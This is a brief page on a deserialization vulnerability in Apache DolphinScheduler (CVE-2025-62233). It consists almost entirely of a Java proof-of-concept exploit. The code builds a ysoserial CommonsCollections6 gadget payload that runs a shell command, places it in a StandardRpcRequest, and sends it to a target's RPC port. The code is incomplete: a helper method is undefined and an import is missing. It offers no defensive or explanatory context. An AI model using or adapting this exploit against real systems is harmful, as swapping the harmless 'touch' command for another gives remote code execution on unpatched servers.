CVE-2025-62233 Apache DolphinScheduler反序列化漏洞

/* * PoC Concept for CVE-2025-62233 * This demonstrates how to craft a malicious RPC request. */ import org.apache.dolphinscheduler.rpc.StandardRpcRequest; import ysoserial.payloads.ObjectPayload; public class Exploit { public static void main(String[] args) throws Exception { // 1. Generate malicious payload (e.g., using CommonsCollections) String command = "touch /tmp/pwned"; ObjectPayload payload = new CommonsCollections6(); Object maliciousObject = payload.getObject(command); // 2. Construct the malicious StandardRpcRequest StandardRpcRequest request = new StandardRpcRequest(); request.setClassName(maliciousObject.getClass().getName()); request.setArgs(new Object[]{maliciousObject}); // 3. Send request to target Master/Worker via RPC port sendRpcRequest("target-master-ip:port", request); } }